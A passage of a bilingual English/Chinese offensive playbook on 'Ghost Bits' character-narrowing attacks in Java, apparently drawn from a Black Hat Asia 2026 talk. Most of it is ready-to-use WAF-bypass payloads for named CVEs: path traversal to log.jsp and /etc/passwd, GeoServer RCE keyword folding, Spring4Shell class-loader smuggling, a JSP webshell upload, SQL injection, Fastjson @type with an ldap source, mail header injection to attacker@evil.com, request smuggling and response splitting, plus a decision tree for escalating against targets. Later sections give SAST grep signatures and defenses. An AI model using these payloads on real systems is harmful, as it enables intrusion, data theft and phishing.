Use these exactly when the corresponding CVE is patched but a WAF still fronts the service. Each Payload below shifts the original ASCII attack into a form that survives string-based WAF rules.
当对应CVE已修复但服务仍由WAF防护时,可使用以下方案。每个payload将原始ASCII攻击转换为能避开基于字符串的WAF规则的形式。

Openfire CVE-2023-32315 — auth bypass (Family B)

Openfire CVE-2023-32315 — 认证绕过(B类)

Original public bypass:
GET /setup/setup-s/%u002e%u002e/%u002e%u002e/log.jsp
Ghost Bits /
%2>
folding bypass (much harder to signature):
GET /setup/setup-s/%2>%2>/%2>%2>/log.jsp
Each
%2>
collapses through Jetty's lax hex into
%2E
=
.
, yielding the same
../../
traversal without ever emitting
..
or
%2e
to the WAF.
公开绕过方案:
GET /setup/setup-s/%u002e%u002e/%u002e%u002e/log.jsp
Ghost Bits /
%2>
折叠绕过方案(更难被特征识别):
GET /setup/setup-s/%2>%2>/%2>%2>/log.jsp
每个
%2>
通过Jetty宽松的十六进制解析折叠为
%2E
=
.
,实现与原始方案相同的
../../
遍历,但WAF从未检测到
..
%2e

GeoServer CVE-2024-36401 — RCE via
Runtime
keyword (Family B)

GeoServer CVE-2024-36401 — 通过
Runtime
关键字实现RCE(B类)

Public WAF rules typically block
Runtime
. Inject one folded character:
Ru%6>time
Decoder math:
%6>
->
%6E
->
n
. The expression evaluator now sees
Runtime
, the WAF never did.
公开WAF规则通常会拦截
Runtime
。注入一个折叠字符:
Ru%6>time
解析器计算:
%6>
->
%6E
->
n
。表达式求值器看到的是
Runtime
,而WAF从未检测到。

Spring4Shell CVE-2022-22965 — class loader chain (Family A)

Spring4Shell CVE-2022-22965 — 类加载器链(A类)

Required parameter prefix
class.module.classLoader...
. WAFs block the literal
class
. Substitute via low-byte chars:
Content-Disposition: form-data; name*="㹣౬ᙡ⑳⑳.module.classLoader.resources..."
ComponentCharCode pointLow byte
c
U+3E630x63
l
U+0C6C0x6C
a
U+16610x61
s
U+24730x73
s
U+24730x73
Springs's parameter-name resolver narrows back to
class
.
需要参数前缀
class.module.classLoader...
。WAF会拦截明文
class
。通过低字节字符替换:
Content-Disposition: form-data; name*="㹣౬ᙡ⑳⑳.module.classLoader.resources..."
字符幽灵字符代码点低字节
c
U+3E630x63
l
U+0C6C0x6C
a
U+16610x61
s
U+24730x73
s
U+24730x73
Spring的参数名解析器会将其窄化回
class

Spring CVE-2025-41242 — arbitrary file read (Family A + Family B mix)

Spring CVE-2025-41242 — 任意文件读取(A类 + B类混合)

Already demonstrated in 5.5 above. Payload
阮严灵丰丰甲来
->
.%u002e
->
..
after decode-after-validation.
已在5.5中演示。Payload
阮严灵丰丰甲来
->
.%u002e
-> 解码后得到
..

Jakarta Mail CVE-2025-57733 — Jira-style mail hijack (Family A)

Jakarta Mail CVE-2025-57733 — Jira风格邮件劫持(A类)

to=victim@org.com瘍瘊Subject: Reset code瘍瘊To: attacker@evil.com瘍瘊瘍瘊Your code is 1234
The mail leaves the company SMTP server with valid SPF / DKIM / DMARC, but its
To:
and
Subject:
are attacker-chosen — high-fidelity phishing.

to=victim@org.com瘍瘊Subject: Reset code瘍瘊To: attacker@evil.com瘍瘊瘍瘊Your code is 1234
邮件会带着有效的SPF/DKIM/DMARC离开企业SMTP服务器,但
To:
Subject:
是攻击者指定的——可实现高逼真度的钓鱼攻击。

7. DETECTION DECISION TREE

7. 检测决策树

Use this when triaging a target. The point is to avoid Ghost Bits when it cannot help and to always try it when the preconditions hold.
Is the backend Java? (Server header, error page, JSESSIONID, .do/.action,
                      WebGoat-style stack trace, X-Powered-By, X-Frame-Options
                      with Tomcat default values)
├── No  -> stop, Ghost Bits does not apply
└── Yes
    ├── Is there a WAF / IDS or input filter blocking your literal payload?
    │   ├── No  -> use the literal payload; Ghost Bits is overkill
    │   └── Yes -> continue
    ├── Which sink are you targeting?
    │   ├── File upload via multipart  -> recipe 5.1 (Tomcat filename*)
    │   ├── JSON deserialization       -> recipes 5.3 (Jackson) / 5.4 (Fastjson)
    │   ├── Class loader / BCEL ref    -> recipe 5.2
    │   ├── URL path / parameter       -> recipe 5.5 + Family B `%2>`
    │   ├── Header reflection          -> recipes 5.7 / 5.8
    │   ├── Mail send                  -> recipe 5.6
    │   └── Redis / RESP / XML / RPC   -> recipe 5.9
    ├── Probe with a single non-destructive substitution first
    │   (replace ONE character with its Ghost variant; observe response
    │    diff: status code, length, header echo, error message, time)
    └── If observable difference appears -> escalate by substituting all
                                            blocked characters and chain
                                            through the linked playbook.

用于目标分类时的检测流程。目的是在Ghost Bits无用时避免使用,在满足前提条件时务必尝试。
后端是否为Java?(通过Server头部、错误页面、JSESSIONID、.do/.action后缀、WebGoat风格堆栈跟踪、X-Powered-By、Tomcat默认X-Frame-Options值判断)
├── 否  -> 停止,Ghost Bits不适用
└── 是
    ├── 是否存在WAF/IDS或输入过滤器拦截你的明文payload?
    │   ├── 否  -> 使用明文payload;Ghost Bits属于过度设计
    │   └── 是 -> 继续
    ├── 你要攻击的sink是什么?
    │   ├── 多部分文件上传  -> 方案5.1(Tomcat filename*)
    │   ├── JSON反序列化       -> 方案5.3(Jackson)/5.4(Fastjson)
    │   ├── 类加载器/BCEL引用    -> 方案5.2
    │   ├── URL路径/参数       -> 方案5.5 + B类`%2>`
    │   ├── 头部反射          -> 方案5.7/5.8
    │   ├── 邮件发送                  -> 方案5.6
    │   └── Redis/RESP/XML/RPC   -> 方案5.9
    ├── 先使用单个非破坏性替换进行探测
    │   (将一个字符替换为对应的Ghost变体;观察响应差异:状态码、长度、头部回显、错误信息、响应时间)
    └── 如果出现可观察的差异 -> 将所有被拦截的字符替换为Ghost变体,并结合关联的攻击手册进行升级攻击。

8. SAST / CODE-AUDIT SIGNATURES

8. SAST/代码审计特征

Three priority tiers when reviewing Java source. Search across all your project repos, all dependencies you can shade, and the
lib/
of any deployed appliance.
审查Java源码时的三个优先级层级。搜索所有项目仓库、所有可包含的依赖,以及任何已部署设备的
lib/
目录。

Tier 1 — direct narrowing (Family A)

层级1 — 直接窄化(A类)

\(byte\)\s*\w+
&\s*0[xX][fF][fF]
&\s*255
\.write\(\s*[a-zA-Z_]\w*\s*\)         # OutputStream.write(int)
writeBytes\s*\(
StringBufferInputStream
String\.getBytes\s*\(\s*int
RandomAccessFile.*writeBytes
\\(byte\\)\\s*\\w+
&\\s*0[xX][fF][fF]
&\\s*255
\\.write\\(\\s*[a-zA-Z_]\\w*\\s*\\)         # OutputStream.write(int)
writeBytes\\s*\\(
StringBufferInputStream
String\\.getBytes\\s*\\(\\s*int
RandomAccessFile.*writeBytes

Tier 2 — lax hex / digit decoding (Families B + C)

层级2 — 宽松十六进制/数字解码(B类 + C类)

Character\.digit\s*\(
fromHexDigit
convertHexDigit
fromHex\s*\(
uriDecode
URLDecoder\.decode
sHexValues\[
& 0x1F\)\s*\+\s*\(.*>>.*\) \* 25
Character\\.digit\\s*\\(
fromHexDigit
convertHexDigit
fromHex\\s*\\(
uriDecode
URLDecoder\\.decode
sHexValues\\[
& 0x1F\\)\\s*\\+\\s*\\(.*>>.*\\) \\* 25

Tier 3 — high-risk wrappers and reachability

层级3 — 高风险包装器和可达性

RFC2231                # Tomcat / mail filename* parsing
JavaReader             # BCEL ClassLoader reachable
ASCIIUtility           # Jakarta Mail / Angus Mail
LineParser             # HttpClient header parser
ChunkedDecoder         # request smuggling adjacent
charToHex              # Jackson
encodeUTF8             # candidate for char->byte writer
Per-finding triage applies the five-dimension risk model:
DimensionHigher risk if
Input controlHTTP param, header, filename, JSON key, mail address
Validationa deny/allow list runs before the narrowing site
Narrowing timeconversion happens after security check
Syntax targetresult enters URL / SMTP / HTTP / Redis / file system / SQL grammar
Re-decodingBase64, URL-decode, JSON unescape,
%u
, etc. happen later
Risk formula:
attacker-controlled  +  check-before-narrow  +  result-in-protocol-syntax
                                              +  later-redecoding
                              = HIGH SEVERITY

RFC2231                # Tomcat/邮件filename*解析
JavaReader             # BCEL ClassLoader可达
ASCIIUtility           # Jakarta Mail/Angus Mail
LineParser             # HttpClient头部解析器
ChunkedDecoder         # 请求走私相关
charToHex              # Jackson
encodeUTF8             # char->byte写入器候选
针对每个发现的问题,使用五维度风险模型进行分类:
维度风险更高的情况
输入可控性HTTP参数、头部、文件名、JSON键、邮件地址
校验时机黑白名单在窄化操作之前执行
窄化时机转换操作在安全检查之后执行
语法目标结果进入URL/SMTP/HTTP/Redis/文件系统/SQL语法
二次解码后续存在Base64、URL解码、JSON转义、
%u
等操作
风险公式:
攻击者可控  +  先校验后窄化  +  结果进入协议语法
                          +  存在二次解码
                  = 高严重度

9. DIFFERENTIAL TESTING WORKFLOW

9. 差分测试工作流

A reproducible, black-box procedure to find new Ghost Bits sinks (red team) or to validate a fix (blue team).
1. Pick one dangerous byte T at a time (e.g. 0x2E for '.').

2. Generate the candidate set:
       C = { chr((k << 8) | T) for k in 1..255 }
   Drop surrogates 0xD8XX..0xDFXX.

3. For each candidate c in C:
       a. Send a benign request with c at the chosen position.
       b. Send the same request with literal T at the same position.
       c. Compare four observables:
            - status code
            - response body length
            - response body content hash (or diff)
            - server-side log line (if available)

4. If any candidate produces a response equivalent to T but differs from a
   "neutral" character (e.g. 'X'), you have found a narrowing sink.

5. Repeat for the next T in your priority list:
       0x2E ('.'), 0x2F ('/'), 0x25 ('%'), 0x40 ('@'),
       0x0D ('\r'), 0x0A ('\n'), 0x6A ('j'), 0x73 ('s'),
       0x6C ('l'), 0x61 ('a'), 0x63 ('c'), 0x22 ('"'), 0x27 (''')

6. Cluster sinks by component (response Server header, error stack) — one
   sink usually implies the whole framework version is vulnerable.
This workflow is intentionally protocol-agnostic; the same loop works on a file uploader, a search endpoint, a mail composer, or a Redis-backed cache.

可重现的黑盒流程,用于发现新的Ghost Bits sink(红队)或验证修复效果(蓝队)。
1. 每次选择一个危险字节T(例如0x2E代表'.')。

2. 生成候选字符集:
       C = { chr((k << 8) | T) for k in 1..255 }
   移除代理字符0xD8XX..0xDFXX。

3. 对每个候选字符c in C:
       a. 在指定位置发送包含c的良性请求。
       b. 在相同位置发送包含明文T的相同请求。
       c. 比较四个可观察项:
            - 状态码
            - 响应体长度
            - 响应体内容哈希(或差异)
            - 服务器端日志行(如果可用)

4. 如果任何候选字符产生的响应与T的响应等价,但与“中性”字符(例如'X')的响应不同,则说明找到了一个窄化sink。

5. 对优先级列表中的下一个T重复上述步骤:
       0x2E ('.'), 0x2F ('/'), 0x25 ('%'), 0x40 ('@'),
       0x0D ('\\r'), 0x0A ('\
'), 0x6A ('j'), 0x73 ('s'),
       0x6C ('l'), 0x61 ('a'), 0x63 ('c'), 0x22 ('"'), 0x27 ('\'')

6. 按组件(响应Server头部、错误堆栈)对sink进行聚类——一个sink通常意味着整个框架版本存在漏洞。
该工作流与协议无关;相同的循环可用于文件上传器、搜索端点、邮件编辑器或Redis缓存后端。

10. DEFENSE AWARENESS

10. 防御建议

Five layers, all needed; any single one is bypassable in isolation.
LayerAction
Source codeBan hand-written
(byte) ch
,
& 0xFF
,
out.write(ch)
,
writeBytes
. Use
getBytes(StandardCharsets.UTF_8)
or strict ASCII allowlist for protocol fields.
DecoderReject illegal input. Never default-fold an unknown hex / Unicode digit / Base64 character to 0 or to its low 8 bits.
Validation orderAlways normalize first, then validate. Specifically: strict decode → Unicode NFC/NFKC → protocol normalize (URL
..
resolution,
File.getCanonicalPath
) → security check → execute.
Protocol fieldUse strict allowlists per field (HTTP header value, SMTP envelope, URL path, filename, JSON key, XML tag). Reject CR/LF in any header or address.
WAF / IDSRun a multi-view normalizer. Always inspect the original string AND the
(char) & 0xFF
view AND the URL-decoded view AND the Unicode-NFKC view. Alert when any view contains a dangerous semantic the original lacked.
Blue-team smell tests:
  • Logs contain CJK / Latin-Extended characters at positions where the protocol grammar expects ASCII (filename, header value, mail address).
  • The HEX dump of a request contains bytes outside
    0x20..0x7E
    adjacent to protocol delimiters.
  • A pen-test or scanner reports a "weird 200" that the security monitoring did not flag — Ghost Bits is the most common 2025-2026 cause for that pattern in Java stacks.

需要五层防御;单独任何一层都可被绕过。
层级措施
源码层面禁止手写
(byte) ch
& 0xFF
out.write(ch)
writeBytes
。使用
getBytes(StandardCharsets.UTF_8)
或针对协议字段的严格ASCII白名单。
解码器层面拒绝非法输入。绝不能将未知的十六进制/Unicode数字/Base64字符默认折叠为0或其低8位。
校验顺序始终先归一化,再校验。具体流程:严格解码 → Unicode NFC/NFKC → 协议归一化(URL
..
解析、
File.getCanonicalPath
) → 安全检查 → 执行。
协议字段层面针对每个字段(HTTP头部值、SMTP信封、URL路径、文件名、JSON键、XML标签)使用严格白名单。拒绝任何头部或地址中的CR/LF。
WAF/IDS层面运行多视图归一化器。始终检查原始字符串、
(char) & 0xFF
视图、URL解码视图和Unicode-NFKC视图。当任何视图包含原始字符串中没有的危险语义时触发告警。
蓝队嗅探测试:
  • 日志中在协议语法预期为ASCII的位置(文件名、头部值、邮件地址)出现中日韩/拉丁扩展字符。
  • 请求的十六进制转储中,协议分隔符附近存在
    0x20..0x7E
    以外的字节。
  • 渗透测试或扫描器报告“异常200响应”但安全监控未触发告警——Ghost Bits是2025-2026年Java栈中该模式的最常见原因。

11. QUICK REFERENCE — KEY PAYLOADS

11. 快速参考 — 核心Payload

text
undefined
text
undefined

Ghost char generator

幽灵字符生成器

ghost(T, k) = chr(((k & 0xFF) << 8) | (T & 0xFF)) # avoid k in 0xD8..0xDF
ghost(T, k) = chr(((k & 0xFF) << 8) | (T & 0xFF)) # 避免k取值0xD8..0xDF

Tomcat filename* webshell upload

Tomcat filename* Webshell上传

Content-Disposition: attachment; filename*="UTF-8''shell.陪sp" # → shell.jsp
Content-Disposition: attachment; filename*="UTF-8''shell.陪sp" # → shell.jsp

BCEL ClassLoader bypass (concept)

BCEL ClassLoader绕过(概念)

$$BCEL$$<each-byte-of-class-file-wrapped-in-a-Unicode-char>
$$BCEL$$<每个类文件字节都包装为Unicode字符>

Jackson SQLi smuggling

Jackson SQL注入走私

{"q":"\u丰丰耳失 union select 1,2,3-- "} # → "1 union select…"
{"q":"\u丰丰耳失 union select 1,2,3-- "} # → "1 union select…"

Fastjson @type smuggling

Fastjson @type走私

{"\x4_type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://x"}
{"\x4_type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://x"}

Spring URL decode + Jetty %2> folding

Spring URL解码 + Jetty %2>折叠

GET /api/data?file=阮丯阮丯etc丯passwd GET /setup/setup-s/%2>%2>/log.jsp GET /api?cmd=Ru%6>time
GET /api/data?file=阮丯阮丯etc丯passwd GET /setup/setup-s/%2>%2>/log.jsp GET /api?cmd=Ru%6>time

Spring4Shell name* class smuggling

Spring4Shell name* class走私

Content-Disposition: form-data; name*="㹣౬ᙡ⑳⑳.module.classLoader..."
Content-Disposition: form-data; name*="㹣౬ᙡ⑳⑳.module.classLoader..."

Spring CVE-2025-41242 path read

Spring CVE-2025-41242路径读取

GET /resources/阮严灵丰丰甲来/secret.properties # → ../%u002e
GET /resources/阮严灵丰丰甲来/secret.properties # → ../%u002e

Angus Mail / Jira mail hijack

Angus Mail / Jira邮件劫持

From: hacker@evil.com瘍瘊Subject: Reset瘍瘊To: victim@org.com瘍瘊瘍瘊Your code is 1234
From: hacker@evil.com瘍瘊Subject: Reset瘍瘊To: victim@org.com瘍瘊瘍瘊Your code is 1234

Apache HttpClient ≤4.5.9 smuggling

Apache HttpClient ≤4.5.9请求走私

X-Auth-Token: 1瘍瘊POST /admin HTTP/1.1\r\nHost: internal\r\nContent-Length: 0\r\n\r\nGET /public HTTP/1.1
X-Auth-Token: 1瘍瘊POST /admin HTTP/1.1\r
Host: internal\r
Content-Length: 0\r
\r
GET /public HTTP/1.1

JDK HttpServer response splitting (CVE-2026-21933)

JDK HttpServer响应拆分(CVE-2026-21933)

?ref=Cu瘍瘊Content-Type:text/html瘍瘊Content-Length:33瘍瘊瘍瘊<script>alert(1)</script>
?ref=Cu瘍瘊Content-Type:text/html瘍瘊Content-Length:33瘍瘊瘍瘊<script>alert(1)</script>

SAST first-pass grep

SAST首次搜索

grep -RnE '(byte)\s*\w+|& 0[xX][fF][fF]|writeBytes|baos.write(\w+)' src/ grep -RnE 'Character.digit|fromHexDigit|charToHex|uriDecode' src/

---
grep -RnE '\(byte\)\s*\w+|& 0[xX][fF][fF]|writeBytes|baos\.write\(\w+\)' src/ grep -RnE 'Character\.digit|fromHexDigit|charToHex|uriDecode' src/

---

REFERENCES

参考资料

  • Black Hat Asia 2026 — Cast Attack: A New Threat Posed by Ghost Bits in Java. Speakers: Xinyu Bai (@b1u3r / @iSafeBlue), Zhihui Chen (@1ue). Contributor: Zongzheng Zheng (@chun_springX).
  • Real-world CVEs re-enabled: GeoServer CVE-2024-36401, Spring4Shell CVE-2022-22965, Openfire CVE-2023-32315, Spring CVE-2025-41242, Jakarta Mail CVE-2025-57733, JDK HttpServer CVE-2026-21933, Apache HttpClient HTTPCLIENT-1974 / HTTPCLIENT-1978.
  • Patched components to upgrade past: Apache Commons BCEL >= 6.12.0, Fastjson 2.x latest, Apache HttpClient >= 4.5.10 (or migrate to 5.x), GeoServer >= 2.28.3, Openfire >= 5.0.4. Confirm vendor advisories before relying on any single version number.
  • Black Hat Asia 2026 — 《Cast Attack: A New Threat Posed by Ghost Bits in Java》。演讲者:Xinyu Bai (@b1u3r / @iSafeBlue)、Zhihui Chen (@1ue)。贡献者:Zongzheng Zheng (@chun_springX)。
  • 重新启用的真实世界CVE:GeoServer CVE-2024-36401、Spring4Shell CVE-2022-22965、Openfire CVE-2023-32315、Spring CVE-2025-41242、Jakarta Mail CVE-2025-57733、JDK HttpServer CVE-2026-21933、Apache HttpClient HTTPCLIENT-1974 / HTTPCLIENT-1978。
  • 需要升级的已修复组件:Apache Commons BCEL >= 6.12.0、Fastjson 2.x最新版本、Apache HttpClient >= 4.5.10(或迁移到5.x)、GeoServer >= 2.28.3、Openfire >= 5.0.4。依赖任何单一版本号前,请确认厂商公告。",